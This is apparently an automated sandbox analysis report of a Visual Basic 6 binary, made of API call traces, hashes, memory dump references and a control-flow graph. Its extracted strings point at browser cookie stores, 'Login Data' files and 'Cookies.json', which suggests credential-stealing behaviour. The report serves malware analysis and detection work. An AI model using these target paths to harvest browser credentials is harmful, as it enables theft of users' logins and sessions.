                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004346D0
                                                          • __vbaStrCat.MSVBVM60(004055A8,00659730), ref: 004346F3
                                                          • __vbaStrMove.MSVBVM60 ref: 004346FE
                                                          • __vbaAryMove.MSVBVM60((En,?,00000000,0043D064), ref: 0043471E
                                                          • __vbaFreeStr.MSVBVM60 ref: 00434727
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 00434751
                                                          • __vbaI2I4.MSVBVM60 ref: 00434759
                                                          • __vbaStrCopy.MSVBVM60 ref: 004347B2
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 004347C6
                                                          • __vbaStrCopy.MSVBVM60 ref: 004347D4
                                                          • __vbaStrMove.MSVBVM60 ref: 004347F3
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0043480B
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 004348A4
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004348AB
                                                          • __vbaUbound.MSVBVM60(00000001,006597C0), ref: 00435DBB
                                                          • __vbaI2I4.MSVBVM60 ref: 00435DC3
                                                          • __vbaStrCat.MSVBVM60(004055A8,006597C0), ref: 00435EA7
                                                          • __vbaStrMove.MSVBVM60 ref: 00435EB2
                                                          • __vbaAryMove.MSVBVM60((En,?,00000000,0043D064), ref: 00435ED2
                                                          • __vbaFreeStr.MSVBVM60 ref: 00435EDB
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 00435F05
                                                          • __vbaI2I4.MSVBVM60 ref: 00435F0D
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F6C
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00435F80
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F8E
                                                          • __vbaStrMove.MSVBVM60 ref: 00435FAD
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 004375DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Copy$ErrorUbound$BoundsFreeGenerate$Overflow
                                                          • String ID: (En$1$192E3639033F0303$1E08152C02383D211B080A200F030836$Cookies.json$DEmYVhVfpKtLM$JBLpJcMQUGKeOdjmEdqOvwF$Profiles$\Profiles$\User Data$\User Data\Default\Cookies
                                                          • API String ID: 2627448202-4058830025
                                                          • Opcode ID: ac622c2d6c7906da4e974c1b718f466a0c548926d6c1e0137913b99306399d3f
                                                          • Instruction ID: a77b62bd0c02affc347b8062058657ca77ebf30411171d4485592245786ace43
                                                          • Opcode Fuzzy Hash: ac622c2d6c7906da4e974c1b718f466a0c548926d6c1e0137913b99306399d3f
                                                          • Instruction Fuzzy Hash: 62E25070D00204DFDB18DF94ED84AEEB7B5FB48704F20916AE506B72A4DB74A986CF58
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00435E6A
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00435E84
                                                          • __vbaStrCat.MSVBVM60(004055A8,006597C0), ref: 00435EA7
                                                          • __vbaStrMove.MSVBVM60 ref: 00435EB2
                                                          • __vbaAryMove.MSVBVM60((En,?,00000000,0043D064), ref: 00435ED2
                                                          • __vbaFreeStr.MSVBVM60 ref: 00435EDB
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 00435F05
                                                          • __vbaI2I4.MSVBVM60 ref: 00435F0D
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F6C
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00435F80
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F8E
                                                          • __vbaStrMove.MSVBVM60 ref: 00435FAD
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00435FC5
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 0043605E
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00436065
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,004375CB), ref: 004375B5
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004375C4
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 004375DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Error$BoundsCopyDestructGenerate$FreeOverflowUbound
                                                          • String ID: (En$192E3639033F0303$1E08152C02383D211B080A200F030836$Cookies.json$DEmYVhVfpKtLM$JBLpJcMQUGKeOdjmEdqOvwF$Profiles$\Profiles$\User Data$\User Data\Default\Cookies$b
                                                          • API String ID: 417474364-1767295083
                                                          • Opcode ID: 00f0c162d805606f1e688d39c5cbe6d497086ef8935af96a2b868f2b3a87b913
                                                          • Instruction ID: 734cec1f607be98f8d2858ac2c778b1fbb00d1033b7945622ddb2a7d0b7a6129
                                                          • Opcode Fuzzy Hash: 00f0c162d805606f1e688d39c5cbe6d497086ef8935af96a2b868f2b3a87b913
                                                          • Instruction Fuzzy Hash: 27E26F70D00205DFDB18DF94ED88AEEB7B5FB48704F20916AE506B72A0DB749986CF58
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60 ref: 004347B2
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 004347C6
                                                          • __vbaStrCopy.MSVBVM60 ref: 004347D4
                                                          • __vbaStrMove.MSVBVM60 ref: 004347F3
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0043480B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434852
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0043486C
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 004348A4
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004348AB
                                                          • #645.MSVBVM60(00000008,00000000), ref: 004348C1
                                                          • __vbaStrMove.MSVBVM60 ref: 004348CC
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 004348D8
                                                          • __vbaFreeStrList.MSVBVM60(00000007,00000000,?,?,?,?,00000000,00000000), ref: 00434908
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 00434914
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 00434937
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 00434984
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 0043499E
                                                          • #712.MSVBVM60(006E4528,\User Data,00405638,00000001,000000FF,00000000,?,?,?,?,00000000,?,00000000,004030D6), ref: 004349CC
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 004349D9
                                                          • __vbaLenBstr.MSVBVM60(00678914), ref: 004349FB
                                                          • #709.MSVBVM60(00678914,004055A8,000000FF,00000000), ref: 00434A13
                                                          • #619.MSVBVM60(?,00004008,00000000), ref: 00434A2A
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 00434A34
                                                          • __vbaStrMove.MSVBVM60 ref: 00434A41
                                                          • __vbaFreeVar.MSVBVM60 ref: 00434A4A
                                                          • __vbaStrCopy.MSVBVM60 ref: 00434A5F
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00434A73
                                                          • __vbaStrCopy.MSVBVM60 ref: 00434A81
                                                          • __vbaStrMove.MSVBVM60 ref: 00434AA0
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00434AB8
                                                          • __vbaAryLock.MSVBVM60(?,006E4528), ref: 00434AC9
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434B05
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434B1F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434B6B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00434B85
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 00434BBD
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00434BC4
                                                          • __vbaStrMove.MSVBVM60 ref: 00434BCF
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00434BF0
                                                          • __vbaAryUnlock.MSVBVM60(00000000), ref: 00434BFA
                                                          • __vbaFreeStrList.MSVBVM60(00000008,00000000,?,?,?,?,?,00000000,00000000), ref: 00434C22
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00434C3E
                                                          • __vbaStrCat.MSVBVM60(004055A8,00673F04), ref: 00434C5A
                                                          • __vbaStrMove.MSVBVM60 ref: 00434C65
                                                          • __vbaStrCat.MSVBVM60(0065A3F4,00000000), ref: 00434C73
                                                          • __vbaStrMove.MSVBVM60 ref: 00434C7E
                                                          • __vbaStrCat.MSVBVM60(Cookies.json,00000000), ref: 00434C8A
                                                          • __vbaStrMove.MSVBVM60 ref: 00434C95
                                                          • __vbaFreeStrList.MSVBVM60(00000003,00000000,?,?,?,0043D04C), ref: 00434CB7
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 004375DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Error$BoundsGenerate$Copy$BstrList$#516#631$#537#608#619#632#645#709#712LockOverflowUnlock
                                                          • String ID: (En$1$192E3639033F0303$1E08152C02383D211B080A200F030836$Cookies.json$DEmYVhVfpKtLM$JBLpJcMQUGKeOdjmEdqOvwF$Profiles$\Profiles$\User Data$\User Data\Default\Cookies
                                                          • API String ID: 121712971-4058830025
                                                          • Opcode ID: b421f920f424ace3fc824f09ae8c436ee2e816baf89c2b308448551de93d6578
                                                          • Instruction ID: ae9ffc1dfa9b214b0c55ad2134e1dccb8e2720b913e095cdf957c26746d87182
                                                          • Opcode Fuzzy Hash: b421f920f424ace3fc824f09ae8c436ee2e816baf89c2b308448551de93d6578
                                                          • Instruction Fuzzy Hash: 85D25070D00204DFDB18DF94ED84AEEB7B5FB48704F209269E506B72A4DB74A986CF58
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F6C
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00435F80
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F8E
                                                          • __vbaStrMove.MSVBVM60 ref: 00435FAD
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00435FC5
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0043600C
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00436026
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 0043605E
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00436065
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0043607B
                                                          • __vbaStrMove.MSVBVM60 ref: 00436086
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00436092
                                                          • __vbaFreeStrList.MSVBVM60(00000007,00000000,?,?,?,?,00000000,00000000), ref: 004360C2
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 004360CE
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 004360F1
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 0043613E
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 00436158
                                                          • #712.MSVBVM60(006E4528,\User Data,00405638,00000001,000000FF,00000000,?,?,?,?,00000000,?,00000000,004030D6), ref: 00436186
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,?,00000000,004030D6), ref: 00436193
                                                          • __vbaLenBstr.MSVBVM60(00678914), ref: 004361B5
                                                          • #709.MSVBVM60(00678914,004055A8,000000FF,00000000), ref: 004361CD
                                                          • #619.MSVBVM60(?,00004008,00000000), ref: 004361E4
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 004361EE
                                                          • __vbaStrMove.MSVBVM60 ref: 004361FB
                                                          • __vbaFreeVar.MSVBVM60 ref: 00436204
                                                          • __vbaStrCopy.MSVBVM60 ref: 00436219
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 0043622D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0043623B
                                                          • __vbaStrMove.MSVBVM60 ref: 0043625A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00436272
                                                          • __vbaAryLock.MSVBVM60(?,006E4528), ref: 00436283
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004362BF
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004362D9
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00436325
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0043633F
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 00436377
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0043637E
                                                          • __vbaStrMove.MSVBVM60 ref: 00436389
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004363AA
                                                          • __vbaAryUnlock.MSVBVM60(00000000), ref: 004363B4
                                                          • __vbaFreeStrList.MSVBVM60(00000008,00000000,?,?,?,?,?,00000000,00000000), ref: 004363DC
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 004363F8
                                                          • __vbaStrCat.MSVBVM60(004055A8,00673F04), ref: 00436414
                                                          • __vbaStrMove.MSVBVM60 ref: 0043641F
                                                          • __vbaStrCat.MSVBVM60(0065A3F4,00000000), ref: 0043642D
                                                          • __vbaStrMove.MSVBVM60 ref: 00436438
                                                          • __vbaStrCat.MSVBVM60(Cookies.json,00000000), ref: 00436444
                                                          • __vbaStrMove.MSVBVM60 ref: 0043644F
                                                          • __vbaFreeStrList.MSVBVM60(00000003,00000000,?,?,?,0043D04C), ref: 00436471
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 004375DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Error$BoundsGenerate$Copy$BstrList$#516#631$#537#608#619#632#645#709#712LockOverflowUnlock
                                                          • String ID: (En$192E3639033F0303$1E08152C02383D211B080A200F030836$Cookies.json$DEmYVhVfpKtLM$JBLpJcMQUGKeOdjmEdqOvwF$Profiles$\Profiles$\User Data$\User Data\Default\Cookies$b
                                                          • API String ID: 121712971-1767295083
                                                          • Opcode ID: c688742e48fdc2bde714b1ae885d0ed570618a750a7e81700eeb62e295415456
                                                          • Instruction ID: d02d6aebbe5c00b9f8010c82a8c5ec97ae720bc9df8b383985e729ed6a906b3a
                                                          • Opcode Fuzzy Hash: c688742e48fdc2bde714b1ae885d0ed570618a750a7e81700eeb62e295415456
                                                          • Instruction Fuzzy Hash: 6AD26F70D00205DFDB18DF94ED88AEEB7B5FB48704F20916AE506B72A0DB749986CF58
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040FE2D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040FE4A
                                                          • __vbaStrCat.MSVBVM60(004055A8,006597C0), ref: 0040FE6E
                                                          • __vbaStrMove.MSVBVM60 ref: 0040FE7C
                                                          • __vbaAryMove.MSVBVM60((En,?,?,0043D064), ref: 0040FEA5
                                                          • __vbaFreeStr.MSVBVM60 ref: 0040FEB1
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 0040FEDC
                                                          • __vbaI2I4.MSVBVM60 ref: 0040FEE4
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF44
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040FF5E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF6F
                                                          • __vbaStrMove.MSVBVM60 ref: 0040FF97
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040FFB8
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 00410062
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00410069
                                                          • __vbaNew2.MSVBVM60(00405678,00000000), ref: 004115DD
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405668,0000002C), ref: 00411644
                                                          • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 004116B6
                                                          • __vbaNew2.MSVBVM60(00405678,00000000), ref: 00411BEF
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405668,0000002C), ref: 00411C56
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00412DD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Error$BoundsCheckCopyGenerateHresultNew2$FreeInitOverflowUbound
                                                          • String ID: (En$1D012D3D2A24701E0A2738$333D2D2928333C13241805111D34572E34002C$EoyHOIFPgxTjvtZwjUtMeZQ$Profiles$S$\Profiles$\User Data$\User Data\Default\Login Data$jAMBZCJPZkSYHclvQlTnjDT
                                                          • API String ID: 206581572-2554719228
                                                          • Opcode ID: b02953c6d4b098427cfe7971ad73c2316b6130e92c63ceccd69bd8c9d5b4b218
                                                          • Instruction ID: 7710c38e92e9a32fe6f3a9a92c0a7591f780a35324375b11a03e7ee2546e520b
                                                          • Opcode Fuzzy Hash: b02953c6d4b098427cfe7971ad73c2316b6130e92c63ceccd69bd8c9d5b4b218
                                                          • Instruction Fuzzy Hash: 8ED21870A01218DFEB24CF54DD84BEAB7B1FB49704F1081EAE549A72A0DB745AC6CF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5263 42d140-42d4ca __vbaChkstk __vbaOnError __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaVarAdd __vbaStrVarMove __vbaStrMove call 42f340 __vbaAryMove __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaVarAdd __vbaStrVarMove __vbaStrMove call 42f340 __vbaAryMove __vbaFreeStrList __vbaFreeVarList #526 __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaStrToAnsi call 4047f4 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr #616 __vbaStrMove __vbaLenBstr #709 5278 42d4d0-42d60e #619 __vbaStrVarVal #712 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #645 __vbaStrMove __vbaStrCmp #645 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVarList 5263->5278 5279 42ddae-42ddb4 __vbaErrorOverflow 5263->5279 5280 42d610-42d620 5278->5280 5281 42d625-42d69b __vbaVarDup #645 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 5278->5281 5282 42d8c3-42dbb8 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaVarAdd * 2 __vbaVarCat * 2 __vbaStrVarMove __vbaStrMove __vbaFreeStrList __vbaFreeVarList #645 __vbaStrMove __vbaStrCmp __vbaFreeStr 5280->5282 5281->5282 5283 42d6a1-42d71d __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove 5281->5283 5307 42dbba-42dbc7 #531 5282->5307 5308 42dbcd-42dbf9 call 40d4e0 call 43b450 __vbaStrMove call 4345b0 5282->5308 5293 42d73b 5283->5293 5294 42d71f-42d739 __vbaNew2 5283->5294 5296 42d745-42d7fe __vbaChkstk * 2 5293->5296 5294->5296 5301 42d823 5296->5301 5302 42d800-42d821 __vbaHresultCheckObj 5296->5302 5304 42d82d-42d8bd __vbaVar2Vec __vbaAryMove __vbaFreeStrList __vbaFreeVarList __vbaFileOpen __vbaPutOwner3 __vbaFileClose 5301->5304 5302->5304 5304->5282 5307->5308 5314 42dbfe-42dc1c 5308->5314 5315 42dc3a 5314->5315 5316 42dc1e-42dc38 __vbaNew2 5314->5316 5317 42dc44-42dc91 __vbaObjSet 5315->5317 5316->5317 5320 42dc93-42dcb4 __vbaHresultCheckObj 5317->5320 5321 42dcb6 5317->5321 5322 42dcc0-42dd9c __vbaFreeObj __vbaAryDestruct * 3 5320->5322 5321->5322
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6,0040CC83), ref: 0042D15E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6,0040CC83), ref: 0042D18E
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6,0040CC83), ref: 0042D1A3
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
